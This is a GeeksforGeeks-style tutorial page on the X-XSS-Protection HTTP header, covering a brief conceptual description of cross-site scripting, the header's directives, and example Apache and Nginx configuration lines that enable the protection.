HTTP headers | X-XSS-Protection

HTTP headers are used to pass additional information with HTTP response or HTTP requests. The X-XSS-Protection in HTTP header is a feature that stops a page from loading when it detects XSS attacks. This feature is becoming unnecessary with increasing content-security-policy of sites.

XSS attacks: Thw XSS stands for Cross-site Scripting. In this attack, the procedure is to bypass the Same-origin policy into vulnerable web applications. When the HTML code generated dynamically and the user input is not sanitized only then the attacker can use this attack. In this attack, an attacker can insert his own HTML code into the webpage which will be not detected by the browsers. For his own HTML code attacker can easily gain access to the database and the cookies. To stop this kind of attacks X-XSS Protection was used in previous days.

Syntax:



X-XSS-Protection: directive

Type of XSS Attack: Cross site scripting attacks are broadly classified into two categories.

  • Server XSS: In this type of attack hacker attaches untrusted data with the HTML response. In this case, vulnerability is present at the server end and the browser just runs the script present in the response.
  • Client XSS: In this type of XSS attack unsafe javascript is used to update the DOM data. If we add javascript code in DOM with a javascript call, such a javascript call is called an unsafe javascript call.

Directives: In this headers filed there are four directives:

  • 0: It disables the X-XSS-Protection.
  • 1: It is the by default directive and enables the X-XSS-Protection.
  • 1; mode=block: It enables the X-XSS-Protection. If the browser detects an attack, it will not render the page.
  • 1; report=<reporting-URI>: It enables the X-XSS-Protection. If the Cross-site SScripting attack detected then the page will be sanitizes and reported by report-uri directive.

Example 1: Block pages from loading when they detect reflected Cross-site Scripting attacks:

filter_none

edit
close

play_arrow

link
brightness_4
code

// It enable the protection
X-XSS-Protection: 1; mode=block
  
// It disable the protection
X-XSS-Protection: 0

chevron_right


Example 2: This will work on appache server.

filter_none

edit
close

play_arrow

link
brightness_4
code

<IfModule mod_headers.c> 
  Header set X-XSS-Protection "1; mode=block" 
</IfModule>

chevron_right


Example 3: This will work on Nginx server.

filter_none

edit
close

play_arrow

link
brightness_4
code

add_header "X-XSS-Protection" "1; mode=block";

chevron_right


Supported Browsers: The browsers supported by HTTP headers X-XSS-Protection are listed below:

  • Google Chrome
  • Internet Explorer
  • Safari
  • Opera


My Personal Notes arrow_drop_up

Check out this Author's contributed articles.

If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks main page and help other Geeks.

Please Improve this article if you find anything incorrect by clicking on the "Improve Article" button below.




Article Tags :

Be the First to upvote.


Please write to us at contribute@geeksforgeeks.org to report any issue with the above content.